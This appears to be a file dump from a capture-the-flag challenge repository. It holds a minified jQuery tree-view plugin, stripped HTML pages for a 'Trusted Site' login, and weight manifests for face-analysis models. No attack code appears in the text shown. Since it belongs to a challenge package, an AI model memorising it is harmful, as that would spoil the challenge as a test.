his.$element.trigger("nodeEnabled",a.extend(!0,{},b))))},g.prototype.render=function(){this.initialized||(this.$element.addClass(e),this.$wrapper=a(this.template.list),this.injectStyle(),this.initialized=!0),this.$element.empty().append(this.$wrapper.empty()),this.buildTree(this.tree,0)},g.prototype.buildTree=function(b,c){if(b){c+=1;var d=this;a.each(b,function(b,e){for(var f=a(d.template.item).addClass("node-"+d.elementId).addClass(e.state.checked?"node-checked":"").addClass(e.state.disabled?"node-disabled":"").addClass(e.state.selected?"node-selected":"").addClass(e.searchResult?"search-result":"").attr("data-nodeid",e.nodeId).attr("style",d.buildStyleOverride(e)),g=0;c-1>g;g++)f.append(d.template.indent);var h=[];if(e.nodes?(h.push("expand-icon"),h.push(e.state.expanded?d.options.collapseIcon:d.options.expandIcon)):h.push(d.options.emptyIcon),f.append(a(d.template.icon).addClass(h.join(" "))),d.options.showIcon){var h=["node-icon"];h.push(e.icon||d.options.nodeIcon),e.state.selected&&(h.pop(),h.push(e.selectedIcon||d.options.selectedIcon||e.icon||d.options.nodeIcon)),f.append(a(d.template.icon).addClass(h.join(" ")))}if(d.options.showCheckbox){var h=["check-icon"];h.push(e.state.checked?d.options.checkedIcon:d.options.uncheckedIcon),f.append(a(d.template.icon).addClass(h.join(" ")))}return f.append(d.options.enableLinks?a(d.template.link).attr("href",e.href).append(e.text):e.text),d.options.showTags&&e.tags&&a.each(e.tags,function(b,c){f.append(a(d.template.badge).append(c))}),d.$wrapper.append(f),e.nodes&&e.state.expanded&&!e.state.disabled?d.buildTree(e.nodes,c):void 0})}},g.prototype.buildStyleOverride=function(a){if(a.state.disabled)return"";var b=a.color,c=a.backColor;return this.options.highlightSelected&&a.state.selected&&(this.options.selectedColor&&(b=this.options.selectedColor),this.options.selectedBackColor&&(c=this.options.selectedBackColor)),this.options.highlightSearchResults&&a.searchResult&&!a.state.disabled&&(this.options.searchResultColor&&(b=this.options.searchResultColor),this.options.searchResultBackColor&&(c=this.options.searchResultBackColor)),"color:"+b+";background-color:"+c+";"},g.prototype.injectStyle=function(){this.options.injectStyle&&!c.getElementById(this.styleId)&&a('").appendTo("head")},g.prototype.buildStyle=function(){var a=".node-"+this.elementId+"{";return this.options.color&&(a+="color:"+this.options.color+";"),this.options.backColor&&(a+="background-color:"+this.options.backColor+";"),this.options.showBorder?this.options.borderColor&&(a+="border:1px solid "+this.options.borderColor+";"):a+="border:none;",a+="}",this.options.onhoverColor&&(a+=".node-"+this.elementId+":not(.node-disabled):hover{background-color:"+this.options.onhoverColor+";}"),this.css+a},g.prototype.template={list:'

    ',item:'
  • ',indent:'',icon:'',link:'',badge:''},g.prototype.css=".treeview .list-group-item{cursor:pointer}.treeview span.indent{margin-left:10px;margin-right:10px}.treeview span.icon{width:12px;margin-right:5px}.treeview .node-disabled{color:silver;cursor:not-allowed}",g.prototype.getNode=function(a){return this.nodes[a]},g.prototype.getParent=function(a){var b=this.identifyNode(a);return this.nodes[b.parentId]},g.prototype.getSiblings=function(a){var b=this.identifyNode(a),c=this.getParent(b),d=c?c.nodes:this.tree;return d.filter(function(a){return a.nodeId!==b.nodeId})},g.prototype.getSelected=function(){return this.findNodes("true","g","state.selected")},g.prototype.getUnselected=function(){return this.findNodes("false","g","state.selected")},g.prototype.getExpanded=function(){return this.findNodes("true","g","state.expanded")},g.prototype.getCollapsed=function(){return this.findNodes("false","g","state.expanded")},g.prototype.getChecked=function(){return this.findNodes("true","g","state.checked")},g.prototype.getUnchecked=function(){return this.findNodes("false","g","state.checked")},g.prototype.getDisabled=function(){return this.findNodes("true","g","state.disabled")},g.prototype.getEnabled=function(){return this.findNodes("false","g","state.disabled")},g.prototype.selectNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setSelectedState(a,!0,b)},this)),this.render()},g.prototype.unselectNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setSelectedState(a,!1,b)},this)),this.render()},g.prototype.toggleNodeSelected=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.toggleSelectedState(a,b)},this)),this.render()},g.prototype.collapseAll=function(b){var c=this.findNodes("true","g","state.expanded");this.forEachIdentifier(c,b,a.proxy(function(a,b){this.setExpandedState(a,!1,b)},this)),this.render()},g.prototype.collapseNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setExpandedState(a,!1,b)},this)),this.render()},g.prototype.expandAll=function(b){if(b=a.extend({},f.options,b),b&&b.levels)this.expandLevels(this.tree,b.levels,b);else{var c=this.findNodes("false","g","state.expanded");this.forEachIdentifier(c,b,a.proxy(function(a,b){this.setExpandedState(a,!0,b)},this))}this.render()},g.prototype.expandNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setExpandedState(a,!0,b),a.nodes&&b&&b.levels&&this.expandLevels(a.nodes,b.levels-1,b)},this)),this.render()},g.prototype.expandLevels=function(b,c,d){d=a.extend({},f.options,d),a.each(b,a.proxy(function(a,b){this.setExpandedState(b,c>0?!0:!1,d),b.nodes&&this.expandLevels(b.nodes,c-1,d)},this))},g.prototype.revealNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){for(var c=this.getParent(a);c;)this.setExpandedState(c,!0,b),c=this.getParent(c)},this)),this.render()},g.prototype.toggleNodeExpanded=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.toggleExpandedState(a,b)},this)),this.render()},g.prototype.checkAll=function(b){var c=this.findNodes("false","g","state.checked");this.forEachIdentifier(c,b,a.proxy(function(a,b){this.setCheckedState(a,!0,b)},this)),this.render()},g.prototype.checkNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setCheckedState(a,!0,b)},this)),this.render()},g.prototype.uncheckAll=function(b){var c=this.findNodes("true","g","state.checked");this.forEachIdentifier(c,b,a.proxy(function(a,b){this.setCheckedState(a,!1,b)},this)),this.render()},g.prototype.uncheckNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setCheckedState(a,!1,b)},this)),this.render()},g.prototype.toggleNodeChecked=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.toggleCheckedState(a,b)},this)),this.render()},g.prototype.disableAll=function(b){var c=this.findNodes("false","g","state.disabled");this.forEachIdentifier(c,b,a.proxy(function(a,b){this.setDisabledState(a,!0,b)},this)),this.render()},g.prototype.disableNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setDisabledState(a,!0,b)},this)),this.render()},g.prototype.enableAll=function(b){var c=this.findNodes("true","g","state.disabled");this.forEachIdentifier(c,b,a.proxy(function(a,b){this.setDisabledState(a,!1,b)},this)),this.render()},g.prototype.enableNode=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setDisabledState(a,!1,b)},this)),this.render()},g.prototype.toggleNodeDisabled=function(b,c){this.forEachIdentifier(b,c,a.proxy(function(a,b){this.setDisabledState(a,!a.state.disabled,b)},this)),this.render()},g.prototype.forEachIdentifier=function(b,c,d){c=a.extend({},f.options,c),b instanceof Array||(b=[b]),a.each(b,a.proxy(function(a,b){d(this.identifyNode(b),c)},this))},g.prototype.identifyNode=function(a){return"number"==typeof a?this.nodes[a]:a},g.prototype.search=function(b,c){c=a.extend({},f.searchOptions,c),this.clearSearch({render:!1});var d=[];if(b&&b.length>0){c.exactMatch&&(b="^"+b+"$");var e="g";c.ignoreCase&&(e+="i"),d=this.findNodes(b,e),a.each(d,function(a,b){b.searchResult=!0})}return c.revealResults?this.revealNode(d):this.render(),this.$element.trigger("searchComplete",a.extend(!0,{},d)),d},g.prototype.clearSearch=function(b){b=a.extend({},{render:!0},b);var c=a.each(this.findNodes("true","g","searchResult"),function(a,b){b.searchResult=!1});b.render&&this.render(),this.$element.trigger("searchCleared",a.extend(!0,{},c))},g.prototype.findNodes=function(b,c,d){c=c||"g",d=d||"text";var e=this;return a.grep(this.nodes,function(a){var f=e.getNodeValue(a,d);return"string"==typeof f?f.match(new RegExp(b,c)):void 0})},g.prototype.getNodeValue=function(a,b){var c=b.indexOf(".");if(c>0){var e=a[b.substring(0,c)],f=b.substring(c+1,b.length);return this.getNodeValue(e,f)}return a.hasOwnProperty(b)?a[b].toString():d};var h=function(a){b.console&&b.console.error(a)};a.fn[e]=function(b,c){var d;return this.each(function(){var f=a.data(this,e);"string"==typeof b?f?a.isFunction(f[b])&&"_"!==b.charAt(0)?(c instanceof Array||(c=[c]),d=f[b].apply(f,c)):h("No such method : "+b):h("Not initialized, can not call method : "+b):"boolean"==typeof b?d=f:a.data(this,e,new g(this,a.extend(!0,{},b)))}),d||this}}(jQuery,window,document); -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Trusted Site 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 25 | 26 | 27 |
    28 |
    29 |
    30 |
    31 |
    32 |
    33 |
    34 | 118 | 119 | 120 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Trusted Site 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 27 | 28 | 29 | 30 |
    31 |
    32 |
    33 |
    34 | 55 | 58 |
    59 |
    60 |
    61 | 62 | 329 | 330 | 331 | 332 | 333 | 334 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/age_gender_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/age_gender_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/age_gender_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | [{"weights":[{"name":"entry_flow/conv_in/filters","shape":[3,3,3,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005431825039433498,"min":-0.7441600304023892}},{"name":"entry_flow/conv_in/bias","shape":[32],"dtype":"float32"},{"name":"entry_flow/reduction_block_0/separable_conv0/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005691980614381678,"min":-0.6090419257388395}},{"name":"entry_flow/reduction_block_0/separable_conv0/pointwise_filter","shape":[1,1,32,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.009089225881239947,"min":-1.1179747833925135}},{"name":"entry_flow/reduction_block_0/separable_conv0/bias","shape":[64],"dtype":"float32"},{"name":"entry_flow/reduction_block_0/separable_conv1/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00683894624897078,"min":-0.8138346036275228}},{"name":"entry_flow/reduction_block_0/separable_conv1/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.011632566358528886,"min":-1.3028474321552352}},{"name":"entry_flow/reduction_block_0/separable_conv1/bias","shape":[64],"dtype":"float32"},{"name":"entry_flow/reduction_block_0/expansion_conv/filters","shape":[1,1,32,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010254812240600587,"min":-0.9229331016540528}},{"name":"entry_flow/reduction_block_0/expansion_conv/bias","shape":[64],"dtype":"float32"},{"name":"entry_flow/reduction_block_1/separable_conv0/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0052509616403018725,"min":-0.6406173201168285}},{"name":"entry_flow/reduction_block_1/separable_conv0/pointwise_filter","shape":[1,1,64,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010788509424994973,"min":-1.4564487723743214}},{"name":"entry_flow/reduction_block_1/separable_conv0/bias","shape":[128],"dtype":"float32"},{"name":"entry_flow/reduction_block_1/separable_conv1/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00553213918910307,"min":-0.7025816770160899}},{"name":"entry_flow/reduction_block_1/separable_conv1/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.013602388606351965,"min":-1.6186842441558837}},{"name":"entry_flow/reduction_block_1/separable_conv1/bias","shape":[128],"dtype":"float32"},{"name":"entry_flow/reduction_block_1/expansion_conv/filters","shape":[1,1,64,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.007571851038465313,"min":-1.158493208885193}},{"name":"entry_flow/reduction_block_1/expansion_conv/bias","shape":[128],"dtype":"float32"},{"name":"middle_flow/main_block_0/separable_conv0/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005766328409606335,"min":-0.6688940955143349}},{"name":"middle_flow/main_block_0/separable_conv0/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.012136116214826995,"min":-1.5776951079275094}},{"name":"middle_flow/main_block_0/separable_conv0/bias","shape":[128],"dtype":"float32"},{"name":"middle_flow/main_block_0/separable_conv1/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004314773222979377,"min":-0.5652352922102984}},{"name":"middle_flow/main_block_0/separable_conv1/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01107162026798024,"min":-1.2400214700137868}},{"name":"middle_flow/main_block_0/separable_conv1/bias","shape":[128],"dtype":"float32"},{"name":"middle_flow/main_block_0/separable_conv2/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0036451735917259667,"min":-0.4848080876995536}},{"name":"middle_flow/main_block_0/separable_conv2/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008791744942758598,"min":-1.134135097615859}},{"name":"middle_flow/main_block_0/separable_conv2/bias","shape":[128],"dtype":"float32"},{"name":"middle_flow/main_block_1/separable_conv0/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004915751896652521,"min":-0.6095532351849126}},{"name":"middle_flow/main_block_1/separable_conv0/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010868691463096469,"min":-1.3368490499608656}},{"name":"middle_flow/main_block_1/separable_conv0/bias","shape":[128],"dtype":"float32"},{"name":"middle_flow/main_block_1/separable_conv1/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005010117269029804,"min":-0.6012140722835765}},{"name":"middle_flow/main_block_1/separable_conv1/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010311148213405235,"min":-1.3816938605963016}},{"name":"middle_flow/main_block_1/separable_conv1/bias","shape":[128],"dtype":"float32"},{"name":"middle_flow/main_block_1/separable_conv2/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004911523706772748,"min":-0.7367285560159123}},{"name":"middle_flow/main_block_1/separable_conv2/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008976466047997568,"min":-1.2207993825276693}},{"name":"middle_flow/main_block_1/separable_conv2/bias","shape":[128],"dtype":"float32"},{"name":"exit_flow/reduction_block/separable_conv0/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005074804436926748,"min":-0.7104726211697447}},{"name":"exit_flow/reduction_block/separable_conv0/pointwise_filter","shape":[1,1,128,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.011453078307357489,"min":-1.4545409450344011}},{"name":"exit_flow/reduction_block/separable_conv0/bias","shape":[256],"dtype":"float32"},{"name":"exit_flow/reduction_block/separable_conv1/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.007741751390344957,"min":-1.1380374543807086}},{"name":"exit_flow/reduction_block/separable_conv1/pointwise_filter","shape":[1,1,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.011347713189966538,"min":-1.497898141075583}},{"name":"exit_flow/reduction_block/separable_conv1/bias","shape":[256],"dtype":"float32"},{"name":"exit_flow/reduction_block/expansion_conv/filters","shape":[1,1,128,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006717281014311547,"min":-0.8329428457746318}},{"name":"exit_flow/reduction_block/expansion_conv/bias","shape":[256],"dtype":"float32"},{"name":"exit_flow/separable_conv/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0027201742518181892,"min":-0.3237007359663645}},{"name":"exit_flow/separable_conv/pointwise_filter","shape":[1,1,256,512],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010076364348916447,"min":-1.330080094056971}},{"name":"exit_flow/separable_conv/bias","shape":[512],"dtype":"float32"},{"name":"fc/age/weights","shape":[512,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.008674054987290326,"min":-1.2664120281443876}},{"name":"fc/age/bias","shape":[1],"dtype":"float32"},{"name":"fc/gender/weights","shape":[512,2],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0029948226377075793,"min":-0.34140978069866407}},{"name":"fc/gender/bias","shape":[2],"dtype":"float32"}],"paths":["age_gender_model-shard1"]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_expression_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_expression_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_expression_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | [{"weights":[{"name":"dense0/conv0/filters","shape":[3,3,3,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0057930146946626555,"min":-0.7125408074435067}},{"name":"dense0/conv0/bias","shape":[32],"dtype":"float32"},{"name":"dense0/conv1/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006473719839956246,"min":-0.6408982641556684}},{"name":"dense0/conv1/pointwise_filter","shape":[1,1,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010509579321917366,"min":-1.408283629136927}},{"name":"dense0/conv1/bias","shape":[32],"dtype":"float32"},{"name":"dense0/conv2/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005666389652326995,"min":-0.7252978754978554}},{"name":"dense0/conv2/pointwise_filter","shape":[1,1,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010316079270605948,"min":-1.1760330368490781}},{"name":"dense0/conv2/bias","shape":[32],"dtype":"float32"},{"name":"dense0/conv3/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0063220320963392074,"min":-0.853474333005793}},{"name":"dense0/conv3/pointwise_filter","shape":[1,1,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010322785377502442,"min":-1.4658355236053466}},{"name":"dense0/conv3/bias","shape":[32],"dtype":"float32"},{"name":"dense1/conv0/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0042531527724920535,"min":-0.5741756242864272}},{"name":"dense1/conv0/pointwise_filter","shape":[1,1,32,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010653339647779278,"min":-1.1825207009035}},{"name":"dense1/conv0/bias","shape":[64],"dtype":"float32"},{"name":"dense1/conv1/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005166931012097527,"min":-0.6355325144879957}},{"name":"dense1/conv1/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.011478300188101974,"min":-1.3888743227603388}},{"name":"dense1/conv1/bias","shape":[64],"dtype":"float32"},{"name":"dense1/conv2/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006144821410085641,"min":-0.8479853545918185}},{"name":"dense1/conv2/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010541967317169788,"min":-1.3809977185492421}},{"name":"dense1/conv2/bias","shape":[64],"dtype":"float32"},{"name":"dense1/conv3/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005769844849904378,"min":-0.686611537138621}},{"name":"dense1/conv3/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010939095534530341,"min":-1.2689350820055196}},{"name":"dense1/conv3/bias","shape":[64],"dtype":"float32"},{"name":"dense2/conv0/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0037769308277204924,"min":-0.40790852939381317}},{"name":"dense2/conv0/pointwise_filter","shape":[1,1,64,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01188667194516051,"min":-1.4382873053644218}},{"name":"dense2/conv0/bias","shape":[128],"dtype":"float32"},{"name":"dense2/conv1/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006497045825509464,"min":-0.8381189114907208}},{"name":"dense2/conv1/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.011632198913424622,"min":-1.3377028750438316}},{"name":"dense2/conv1/bias","shape":[128],"dtype":"float32"},{"name":"dense2/conv2/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005947182225246056,"min":-0.7969224181829715}},{"name":"dense2/conv2/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.011436844339557722,"min":-1.4524792311238306}},{"name":"dense2/conv2/bias","shape":[128],"dtype":"float32"},{"name":"dense2/conv3/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006665432686899222,"min":-0.8998334127313949}},{"name":"dense2/conv3/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01283421422920975,"min":-1.642779421338848}},{"name":"dense2/conv3/bias","shape":[128],"dtype":"float32"},{"name":"dense3/conv0/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004711699953266218,"min":-0.6737730933170692}},{"name":"dense3/conv0/pointwise_filter","shape":[1,1,128,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010955964817720302,"min":-1.3914075318504784}},{"name":"dense3/conv0/bias","shape":[256],"dtype":"float32"},{"name":"dense3/conv1/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00554193468654857,"min":-0.7149095745647656}},{"name":"dense3/conv1/pointwise_filter","shape":[1,1,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.016790372250126858,"min":-2.484975093018775}},{"name":"dense3/conv1/bias","shape":[256],"dtype":"float32"},{"name":"dense3/conv2/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006361540626077091,"min":-0.8142772001378676}},{"name":"dense3/conv2/pointwise_filter","shape":[1,1,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01777329678628959,"min":-1.7062364914838006}},{"name":"dense3/conv2/bias","shape":[256],"dtype":"float32"},{"name":"dense3/conv3/depthwise_filter","shape":[3,3,256,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.006900275922289082,"min":-0.8625344902861353}},{"name":"dense3/conv3/pointwise_filter","shape":[1,1,256,256],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.015449936717164282,"min":-1.9003422162112067}},{"name":"dense3/conv3/bias","shape":[256],"dtype":"float32"},{"name":"fc/weights","shape":[256,7],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004834276554631252,"min":-0.7203072066400565}},{"name":"fc/bias","shape":[7],"dtype":"float32"}],"paths":["face_expression_model-shard1"]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/face_landmark_68_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | [{"weights":[{"name":"dense0/conv0/filters","shape":[3,3,3,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004853619781194949,"min":-0.5872879935245888}},{"name":"dense0/conv0/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004396426443960153,"min":-0.7298067896973853}},{"name":"dense0/conv1/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00635151559231328,"min":-0.5589333721235686}},{"name":"dense0/conv1/pointwise_filter","shape":[1,1,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.009354315552057004,"min":-1.2628325995276957}},{"name":"dense0/conv1/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0029380727048013726,"min":-0.5846764682554731}},{"name":"dense0/conv2/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0049374802439820535,"min":-0.6171850304977566}},{"name":"dense0/conv2/pointwise_filter","shape":[1,1,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.009941946758943446,"min":-1.3421628124573652}},{"name":"dense0/conv2/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0030300481062309416,"min":-0.5272283704841838}},{"name":"dense0/conv3/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005672684837790097,"min":-0.7431217137505026}},{"name":"dense0/conv3/pointwise_filter","shape":[1,1,32,32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010712201455060173,"min":-1.5639814124387852}},{"name":"dense0/conv3/bias","shape":[32],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0030966934035806097,"min":-0.3839899820439956}},{"name":"dense1/conv0/depthwise_filter","shape":[3,3,32,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0039155554537679636,"min":-0.48161332081345953}},{"name":"dense1/conv0/pointwise_filter","shape":[1,1,32,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01023082966898002,"min":-1.094698774580862}},{"name":"dense1/conv0/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0027264176630506327,"min":-0.3871513081531898}},{"name":"dense1/conv1/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004583378632863362,"min":-0.5454220573107401}},{"name":"dense1/conv1/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00915846403907327,"min":-1.117332612766939}},{"name":"dense1/conv1/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.003091680419211294,"min":-0.5966943209077797}},{"name":"dense1/conv2/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.005407439727409214,"min":-0.708374604290607}},{"name":"dense1/conv2/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00946493943532308,"min":-1.2399070660273235}},{"name":"dense1/conv2/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004409168514550901,"min":-0.9788354102303}},{"name":"dense1/conv3/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.004478132958505668,"min":-0.6493292789833219}},{"name":"dense1/conv3/pointwise_filter","shape":[1,1,64,64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.011063695888893277,"min":-1.2501976354449402}},{"name":"dense1/conv3/bias","shape":[64],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.003909627596537272,"min":-0.6646366914113363}},{"name":"dense2/conv0/depthwise_filter","shape":[3,3,64,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.003213915404151468,"min":-0.3374611174359041}},{"name":"dense2/conv0/pointwise_filter","shape":[1,1,64,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.010917326048308728,"min":-1.4520043644250609}},{"name":"dense2/conv0/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.002800439152063108,"min":-0.38085972468058266}},{"name":"dense2/conv1/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0050568851770139206,"min":-0.6927932692509071}},{"name":"dense2/conv1/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01074961213504567,"min":-1.3222022926106174}},{"name":"dense2/conv1/bias","shape":[128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.0030654204242369708,"min":-0.5487102559384177}},{"name":"dense2/conv2/depthwise_filter","shape":[3,3,128,1],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.00591809165244009,"min":-0.917304206128214}},{"name":"dense2/conv2/pointwise_filter","shape":[1,1,128,128],"dtype":"float32","quantization":{"dtype":"uint8","scale":0.01092823346455892,"min":-1.366029183069865}},{"name":"dense2/conv2/bias","shape":[128],"dtype":"float32","quantization":{